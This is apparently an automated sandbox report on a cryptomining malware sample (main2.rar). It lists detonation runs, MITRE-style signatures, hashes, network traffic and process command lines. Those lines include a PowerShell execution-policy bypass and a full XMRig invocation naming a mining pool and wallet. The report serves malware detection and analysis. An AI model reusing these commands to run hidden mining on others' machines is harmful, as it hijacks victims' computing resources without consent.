Malware Analysis Report

2025-04-19 18:41

Sample ID 240527-ar54aaae69
Target main2.rar
SHA256 08f3805606e1d457ed9e80b975bee0320651e3d5626e9e7cb896fd45e8fd0f7b
Tags
xmrig execution miner
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral19

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral20

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral25

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral16

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral21

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral12

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral15

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral23

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral22

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral32

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral11

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral17

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral18

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral24

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral28

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral29

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral14

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral30

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral26

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral27

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral13

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral31

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

08f3805606e1d457ed9e80b975bee0320651e3d5626e9e7cb896fd45e8fd0f7b

Threat Level: Known bad

The file main2.rar was found to be: Known bad.

Malicious Activity Summary

xmrig execution miner

XMRig Miner payload

xmrig

Blocklisted process makes network request

Executes dropped EXE

Command and Scripting Interpreter: PowerShell

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious behavior: LoadsDriver

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-27 00:27

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 05:44

Platform

win10-20240404-en

Max time kernel

1799s

Max time network

1797s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 90.16.208.104.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

memory/2272-3-0x00007FFB3FAC3000-0x00007FFB3FAC4000-memory.dmp

memory/2272-5-0x00000198B7E80000-0x00000198B7EA2000-memory.dmp

memory/2272-6-0x00007FFB3FAC0000-0x00007FFB404AC000-memory.dmp

memory/2272-10-0x00000198D0680000-0x00000198D06F6000-memory.dmp

memory/2272-9-0x00007FFB3FAC0000-0x00007FFB404AC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_p0xjhot1.x2b.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/2272-26-0x00007FFB3FAC0000-0x00007FFB404AC000-memory.dmp

memory/2272-49-0x00000198D04A0000-0x00000198D04B2000-memory.dmp

memory/2272-62-0x00000198D0490000-0x00000198D049A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2220-91-0x000001F9EBAE0000-0x000001F9EBB00000-memory.dmp

memory/2220-92-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2272-93-0x00007FFB3FAC0000-0x00007FFB404AC000-memory.dmp

memory/2272-95-0x00007FFB3FAC3000-0x00007FFB3FAC4000-memory.dmp

memory/2220-94-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2272-96-0x00007FFB3FAC0000-0x00007FFB404AC000-memory.dmp

memory/2220-97-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-98-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-99-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-100-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-101-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-102-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-103-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-104-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-105-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-106-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-107-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-108-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-109-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-110-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-111-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-112-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-113-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-114-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-115-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-116-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-117-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-118-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-119-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-120-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-121-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-122-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-123-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-124-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-125-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-126-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-127-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-128-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-129-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-130-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-131-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-132-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-133-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-134-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-135-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-136-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-137-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-138-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-139-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-140-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-141-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-142-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-143-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-144-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-145-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-146-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-147-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-148-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-149-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-150-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-151-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-152-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-153-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-154-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-155-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-156-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-157-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

Analysis: behavioral19

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 06:05

Platform

win10v2004-20240226-en

Max time kernel

1794s

Max time network

1803s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4136 --field-trial-handle=3192,i,2785050981002401924,4037047756083432660,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3692 --field-trial-handle=3192,i,2785050981002401924,4037047756083432660,262144 --variations-seed-version /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 64.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 164.189.21.2.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 13.107.253.64:443 tcp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 171.117.168.52.in-addr.arpa udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
FR 216.58.214.74:443 chromewebstore.googleapis.com tcp
US 8.8.8.8:53 74.214.58.216.in-addr.arpa udp

Files

memory/4336-0-0x00007FFED7BA3000-0x00007FFED7BA5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vvqbeawo.zed.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4336-10-0x0000024AEA140000-0x0000024AEA162000-memory.dmp

memory/4336-11-0x00007FFED7BA0000-0x00007FFED8661000-memory.dmp

memory/4336-12-0x00007FFED7BA0000-0x00007FFED8661000-memory.dmp

memory/4336-13-0x00007FFED7BA0000-0x00007FFED8661000-memory.dmp

memory/4336-15-0x0000024AEC690000-0x0000024AEC6A2000-memory.dmp

memory/4336-16-0x0000024AEA170000-0x0000024AEA17A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2384-47-0x000001D82A290000-0x000001D82A2B0000-memory.dmp

memory/4336-48-0x00007FFED7BA3000-0x00007FFED7BA5000-memory.dmp

memory/4336-49-0x00007FFED7BA0000-0x00007FFED8661000-memory.dmp

memory/2384-51-0x000001D82A2E0000-0x000001D82A300000-memory.dmp

memory/4336-50-0x00007FFED7BA0000-0x00007FFED8661000-memory.dmp

memory/4336-52-0x00007FFED7BA0000-0x00007FFED8661000-memory.dmp

memory/2384-53-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-54-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-55-0x000001D82A300000-0x000001D82A320000-memory.dmp

memory/2384-56-0x000001D82A320000-0x000001D82A340000-memory.dmp

memory/2384-57-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-58-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-60-0x000001D82A320000-0x000001D82A340000-memory.dmp

memory/2384-59-0x000001D82A300000-0x000001D82A320000-memory.dmp

memory/2384-61-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-62-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-63-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-64-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-65-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-66-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-67-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-68-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-69-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-70-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-71-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-72-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-73-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-74-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-75-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-76-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-77-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-78-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-79-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-80-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-81-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-82-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-83-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-84-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-85-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-86-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-87-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-88-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-89-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-90-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-91-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-92-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-93-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-94-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-95-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-96-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-97-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-98-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-99-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-100-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-101-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-102-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-103-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-104-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-105-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-106-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-107-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-108-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-109-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-110-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-111-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-112-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-113-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-114-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-115-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-116-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-117-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-118-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-119-0x00007FF665B00000-0x00007FF666733000-memory.dmp

Analysis: behavioral20

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 06:05

Platform

win11-20240426-en

Max time kernel

1797s

Max time network

1765s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
